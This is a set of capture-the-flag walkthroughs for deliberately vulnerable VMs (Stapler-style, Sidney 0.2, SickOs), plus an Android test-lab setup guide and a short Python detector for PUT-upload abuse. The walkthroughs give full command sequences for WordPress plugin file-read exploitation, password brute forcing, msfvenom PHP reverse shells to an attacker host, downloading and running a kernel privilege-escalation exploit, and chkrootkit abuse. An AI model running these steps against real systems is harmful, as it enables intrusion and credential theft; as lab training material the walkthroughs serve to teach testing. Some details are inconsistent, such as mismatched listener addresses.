password (password)


And again we found nothing there. Similarly, we tried ports 22, 139 and 666. Alas! We found nothing. Again!
So we decided to explore Nikto further and found that there was a robots.txt file on port 12380 with two entries. We also noticed that the site used SSL, which means it only opens with the https:// prefix.


So first we tried opening it in the browser on port 12380.


Finally, something happened! The site opened on port 12380. Then we opened robots.txt (https://192.168.1.105/robots.txt) and found two entries, i.e. /admin112233/ and /blogblog/

We opened them one by one; only /blogblog/ proved useful, as a blog opened in it.


Studying this blog we established that it is made with WordPress. So obviously we use WPScan to learn all about it. We came up with a 3-in-1 command that enumerates the plugins, the themes and the usernames:
wpscan --url https://192.168.1.105/blogblog/ --enumerate ap --enumerate at --enumerate u


WPScan also informed us about the upload directory, highlighted in the image above.



The scan found one plugin, the Advanced Video plugin. We searched www.exploit-db.com and found one exploit for it.


Reading the exploit we found the URL to request in order to use it to our advantage:
http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILE PATH]


We adapted the URL to our target:
http://192.168.1.105/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php

When this URL is requested it shows an error, but if you pay attention you will notice a change on the WordPress blog.

It gives us an image. We already know the upload directory (from WPScan), so we can go there directly to view/download the image. The URL for this is:
https://192.168.1.105/blogblog/wp-content

If we try to open or download this image it shows an error like the one below:


The trick here is to download the image file without any extension and then read it as text with the following command:
cat 1439829871


This provides us with the MySQL username and password. To enter the MySQL database we use a third-party tool called HeidiSQL_9.3_Portable.

Open the tool, enter the target IP as hostname, the username under user and the password under password, then click OK.


After clicking OK we are in the database.


Click on wp_users to see the usernames and password hashes of all the users.


As you can see, all the passwords are stored as hashes. So now we run a dictionary attack with WPScan against the first username we found, john, using rockyou.txt. The command is:
wpscan --url https://192.168.1.105/blogblog --wordlist /usr/share/wordlists/rockyou.txt --username john


Once the attack completes we have the password for the username john, i.e. incorrect.


Now we will logon using the said username and password.


Now that we are logged in, all we have to do is create a PHP payload to upload, so that once it executes we get a session. To generate the code type (lhost is the Kali machine, the same address the handler below listens on):
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.113 lport=4444 -f raw


Copy the code from <?php to die() and save it in a file with a .php extension.
Now, as we are already logged in, go to Plugins and select Add New. Click Browse, select the PHP file in which you just saved the code and click OK.


Now go to the upload directory and double-click the file you just uploaded.


Simultaneously, open metasploit and type:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.113
set lport 4444
exploit

Executing the above we get a meterpreter session. Further type:
shell
Then type the following two commands, which write a small python script and run it to spawn a proper TTY:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Now we check the Ubuntu version so that we can find its exploit, so type:
lsb_release -a

Now with the following command we will find a writable folder:

find / -writable -type d 2>/dev/null


We now know that our target is running Ubuntu 16.04, so we search for its exploit on exploit-db.com. The search is successful and we found the appropriate exploit, as shown below:

We already know that this exploit is not available in Metasploit, so we copy its download link as shown:


Now we need to go into the writable directory, so type:
cd /tmp
Then download the exploit by typing:
wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip


The download is a zip file, so unzip it by typing:
unzip 39772.zip


Enter the unzipped directory by typing:
ls
cd 39772
Now we have a tar file named exploit.tar. Extract it with the following command:
tar -xvf exploit.tar


Now use the ls command to view the directories. Then go into the doubleput exploit folder and run it:
cd ebpf_mapfd_doubleput_exploit
ls (lists the files)
./compile.sh (builds the exploit)
./doubleput (runs the compiled exploit binary)
whoami (shows which user you are now)
cd /root (takes you into /root)
ls (lists the contents of /root)
cat flag.txt


Hack the Sydney VM (CTF Challenge)

Today we will take up a boot2root challenge by Nightmares: Sidney: 0.2. This is the third challenge he has come up with. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM; you will need to snag the flag. You can download this VM from --> https://www.vulnhub.com/entry/sidney-02,149/

Walkthrough

First we need to know what IP the VM got, so naturally we scan the network using:
netdiscover


Now that we have located our target IP, i.e. 192.168.0.104, our next step is to scan it:
nmap -A -p- 192.168.0.104


The scan shows that port 80 is open, which means this IP opens in the browser, so let us try that.


On opening the target IP in the browser we did not get much information, so we used curl to find out more about our target.


If you look at the source, you can see that the word "commodore64" is used a lot. So we opened it in the browser (192.168.0.104/commodore64) and to our luck found another page.


Then we decided to look into its page source.


Reading the page source you will learn that the username is robhubbard, and going further you will find some hints about the password, i.e.:

·         the password is in lowercase
·         the password has 3 letters and four digits
·         it is related to the c=64 sound chip

After looking into the page source we explored further with nikto.



Exploring with nikto proved helpful as it found an index.php file. We opened it and, as you can see, it asks for a username and password. We already know the username, so we just have to find the password.


Given the above hints about the password, we first looked up the c=64 sound chip on Wikipedia. And we found:


We knew that the password's first three characters are letters, so our best guess is that MOS forms the first three characters of the password.
Now everything depends on the last four digits, and to generate those we used the crunch command:
crunch 7 7 -t mos%%%% -o /root/Desktop/pass.txt


Crunch generates the dictionary file.
Then run a dictionary attack with Burp Suite, which reveals the password as shown below:


Now enter the username and password on the index.php page. After logging in, the following page opens, and on this page you have to upload a malicious php file.


To generate the said php file, open a terminal in your Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw


Copy the code from <?php to die() and save it in a file with a .php extension. Now upload this file by browsing to it on the webpage.


Simultaneously, open metasploit and type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.113
set lport 4444
exploit

Executing the above we get a meterpreter session. Further type:
shell
If you try the usual two commands that write a python script to spawn a TTY, they will not work here, because this target only has a newer Python version:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
So to solve this problem you need to run a different command, i.e.:
python3.5 -c "import pty; pty.spawn('/bin/bash')"
/bin/bash
Now you will reach the terminal. Here, type the following command to find the release version:
lsb_release -a


Now that we know the version, we search for its exploit on www.exploit-db.com


Exploring the exploit page you will find the download link.


Now that we have the exploit to download, we need a writable directory to put it in, so type:
find / -writable -type d 2>/dev/null
Then go into that directory by typing:
cd /tmp
In /tmp, downloading with wget shows an error on this target, so we used the curl command this time:


Now unzip the file by typing:
unzip 39772.zip


Enter the unzipped directory by typing:
cd 39772

Now we have a tar file named exploit.tar. Extract it with the following commands:
ls
tar -xvf exploit.tar
And now move into the doubleput exploit directory by typing:
cd ebpf_mapfd_doubleput_exploit


Moving forward, type:
ls (lists the files)
./compile.sh (builds the exploit)
./doubleput (runs the compiled exploit binary)
whoami (shows which user you are now)
cd /root (takes you into /root)
ls (lists the contents of /root)


Now we are root on our target. Let's see what it has to offer us, so type:
ls -lsa
All the files are listed, and from the list we try to open hint.gif. First we have to copy it to the web root, so type:
cp hint.gif /var/www/html


If you now open hint.gif in the browser it shows the following image:


So we check the other files too, like .commodore64, so type:
cd .commodore64
And again, to see what it has to offer us, type:
ls -lsa
From all the files listed we open the following:
cd .miami
ls -lsa (lists the folders further)
cd vice (enters vice)
ls (shows flag.zip)


Don't get too excited: we have obtained the flag, but we still have to open it. And here is the trick: if you try to open the zip file it asks for a password. So we will open it from the browser, and for that we first have to copy it, so type:
cp flag.zip /var/www/html/commodore64


When you open it in the browser it offers to download flag.zip. So, download it.

We run a dictionary attack on it using rockyou.txt; the command is:
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt /root/Desktop/flag.zip


And yes, at last you have the password. So now unzip flag.zip by typing:
unzip flag.zip
It asks for the password. Enter the password you just obtained.


And YAY!!!!! We have captured the Flag!!! Enjoy with it.

Build an Android Penetration Testing lab


Nowadays mobile users are increasing day by day, and the security threat is increasing along with them. These threats can disrupt the operation of the smartphone and transmit or modify user data. For these reasons, the applications deployed there should ensure the privacy and integrity of the information they manage. Mobile security involves protecting personal and business information stored on and transmitted from smartphones, tablets, laptops and other mobile devices. Mobile security has become very important in mobile computing because of the daily increase in sophisticated attack methods. So now we will see how to set up a lab to exploit and analyze android applications for vulnerabilities.

First we have to set up an environment for android application testing.
Requirements for android penetration testing:
·         VirtualBox
·         Santoku OS, which comes with preinstalled SDKs.
·         Genymotion for creating an Android Virtual Device (AVD)
·         A vulnerable android app, "InsecureBankv2".

Let’s start…
First download Santoku OS from here. Santoku OS is built especially for mobile penetration testing and forensic investigation. Santoku comes with pre-installed SDKs and other utilities. There is also a bunch of forensic tools, like firmware flashing tools for multiple vendors and forensic scripts for enumerating app details.

After downloading Santoku open Virtual Box and create a new virtual machine for it.


Now select the RAM for the Santoku VM; the recommended amount is 786MB but I took 2GB. Select according to your own need and click Next.


In this section select the hard disk type as per your need, or select VMDK (Virtual Machine Disk).


Here select the size of the hard disk as you wish and then create the VM.



Now, to install Santoku on the VM we created, right-click the Santoku VM and go to Settings > Storage, select the empty disk, click the disk icon in front of Optical Drive in the Attributes section, then browse to the downloaded Santoku ISO file and click OK.



Finally launch the VM; after a few seconds the Santoku boot menu appears. Select "Install - start the installer directly".


Now the installation process begins. Select your preferred language, click Continue, then click Install Now.



Select your preferred language for the keyboard.


In this section name your VM and set a strong password for login access. You can also choose Login automatically, but that is not a good choice.


Now Santoku starts copying files and installing. Sit back and wait a few minutes; after that it restarts.


Santoku is now installed, which means our first part is completed.

Now you can download Genymotion from here.

Basically, Genymotion is a relatively fast Android emulator which comes with pre-configured Android images with OpenGL hardware acceleration, suitable for application testing.

After installing Genymotion, go to https://www.genymotion.com/account/create/, create a free account there and verify your email ID. Then come back to the Genymotion desktop software and log in using the newly created account credentials.


Now, to create an AVD, click on 'Add'. A new menu appears where you can select android devices by device brand and version number.


Select the device according to your need and click Next. In this section you review the configuration of the android mobile device and finally create the virtual device.


Now the device starts downloading the data and deploying the virtual android device.


Here you can see that I created 2 virtual devices. Now select a device and launch it.

Here is our Android Virtual Device.


To test our application for any kind of vulnerability we need the Android SDK, because in our testing phase we will use the ADB (Android Debug Bridge) command line almost every time. The Android SDK is preinstalled in Santoku OS. So now we are going to connect Santoku to our Android Virtual Device.

First check the IP of the Android Virtual Device.


Now open a command line in Santoku and type (replace <AVD_IP> with the address you just noted; adb uses port 5555 by default):
adb connect <AVD_IP>
You can check whether the device is connected or not by typing:
adb devices

Here we can see that the list shows 1 device connected.


You can also open a shell on the android device by typing:
adb shell

Creating a penetration testing lab for android applications is now complete. Stay tuned for the next article on actual android app penetration testing and hacking.

Hack the SickOS 2.1 VM (CTF Challenge)

In this walkthrough I will explain how to solve the SickOs 1.2 challenge. This OS is the second in the SickOs series and is independent of the prior releases; the scope of the challenge is to gain the highest privileges on the system. This CTF gives a clear analogy of how hacking strategies can be performed on a network to compromise it in a safe environment.
So, first let us find our target by using:


netdiscover


Our target is 192.168.1.105. Next we run an nmap scan:
nmap -A -p- 192.168.1.105


As you can see, port 80 is open, which means we can open this IP in the browser. Why not do that?


Opening the IP in the browser shows the above image, which is of no use. You can look into the page source, but unfortunately you will find nothing there. That is why we use dirb to find the directories. For that type:


As a result you can see we have found our directory, i.e. test. Open it in the browser as well:
192.168.1.105/test/


It shows a directory listing. So let us explore the test directory via curl:

curl -v -X OPTIONS http://192.168.1.105/test


The response shows that PUT is allowed, which means you can upload files through it.
So prepare the malicious file to upload with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.113 lport=4444 -f raw


Copy the code from <?php to die() and save it in a file with a .php extension.
Now, to upload your .php file, we use the Poster add-on.
Click on Tools in the menu bar, then click Poster in the drop-down menu.


The following dialog box opens. Browse to the file you want to upload and click the PUT option.


It shows that the file is uploaded.


You can see the same in your browser: the file has been uploaded (in our case the file is shell.php).
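On the defender's side the same sequence leaves a clear trail in the web server's access log: an OPTIONS probe, a PUT of a .php file with a 2xx status, then a GET of that file. The following is an added example, not code from the original walkthrough; it parses constructed Apache combined-format log lines (the IPs and paths mirror the ones above but the lines are made up) and flags that pattern.

```python
"""Spot upload-by-PUT activity in an Apache combined-format access log.

Added example, not part of the original walkthrough. The SickOs write-up
relies on a directory that answers OPTIONS with PUT allowed and accepts a
PUT of a .php file; the same sequence shows up in the access log as an
OPTIONS probe, a PUT with a 2xx status, then a GET of the new file.
The log lines below are constructed for the example.
"""
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Extensions the web server would execute rather than serve as data.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx", ".cgi", ".pl")

# Methods that write to the document root when WebDAV/PUT is enabled.
WRITE_METHODS = ("PUT", "DELETE", "MOVE", "COPY", "MKCOL")

# Constructed sample log: a probe, a successful script upload and its
# execution, plus a PUT that the server correctly refused.
SAMPLE_LOG = """\
192.168.1.113 - - [14/Mar/2017:10:01:02 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0"
192.168.1.113 - - [14/Mar/2017:10:01:40 +0000] "OPTIONS /test HTTP/1.1" 200 - "-" "curl/7.52.1"
192.168.1.113 - - [14/Mar/2017:10:02:15 +0000] "PUT /test/shell.php HTTP/1.1" 201 - "-" "Mozilla/5.0"
192.168.1.113 - - [14/Mar/2017:10:02:30 +0000] "GET /test/shell.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
192.168.1.50 - - [14/Mar/2017:10:03:00 +0000] "PUT /test/notes.txt HTTP/1.1" 403 - "-" "curl/7.52.1"
"""


def parse_line(line):
    """Return the request fields of one access-log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_put_uploads(text):
    """Return (kind, ip, path, status) findings in log order."""
    findings = []
    written = {}  # path -> ip of the client that successfully wrote it
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, status = rec["ip"], rec["method"], rec["path"], rec["status"]
        if method == "OPTIONS":
            # Method discovery; harmless alone, telling when a PUT follows.
            findings.append(("options_probe", ip, path, status))
        elif method in WRITE_METHODS:
            ok = 200 <= status < 300
            if not ok:
                kind = "write_denied"
            elif path.lower().endswith(SCRIPT_EXT):
                kind = "script_written"      # executable content is now on disk
            else:
                kind = "file_written"
            findings.append((kind, ip, path, status))
            if ok:
                written[path] = ip
        elif method == "GET" and path in written:
            # The uploaded file is being requested; for a script, that is execution.
            findings.append(("written_file_requested", ip, path, status))
    return findings


if __name__ == "__main__":
    for f in find_put_uploads(SAMPLE_LOG):
        print("%-24s %-15s %-20s %d" % f)
```

On Apache the corresponding fix is to restrict the directory with a <LimitExcept GET POST HEAD> block so that PUT is refused outright.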


Simultaneously, open metasploit and use multi/handler:

use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.113
set lport 4444
exploit

After hitting Enter, request the file you just uploaded. It gives you a meterpreter session. Drop to a shell by typing:
shell
Now we write a small python script and run it to spawn a proper TTY; to do so type:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
There might be a kernel version that we could exploit, so check the release version by typing:
lsb_release -a
As you can see, the version is not exploitable, so we leave it alone.


Moving further, type the following to explore more and find something exploitable:
ls -l /etc/cron.daily


The above command lists the daily cron jobs. Observe that chkrootkit is among them. Some of its versions are exploitable, so we check its version by typing:
chkrootkit -V
It shows that the version is 0.49.
We will now search for its exploit in the terminal of Kali by typing :

searchsploit chkrootkit


These are the available exploits.
Now open metasploit, check the already opened session first, and then look for the exploit by typing:
search chkrootkit


The exploit which you have to use will appear. To use it type:
use exploit/unix/local/chkrootkit
Then type options to see which options you are supposed to set. Checking them, you only need to assign the session and lport, so type:
set session 1
set lport 8080
exploit


Now check whether you have gained another session, and for that type:
sessions

As you can see you will have one more session, so to open that session type:
sessions -i 2

As you open the session, check which user you are by typing:
whoami

It shows that you are root, so further type:
cd /root

And to see the list of files in /root type:
ls -lsa

In the list you will see a text file, and to read it type:
cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt
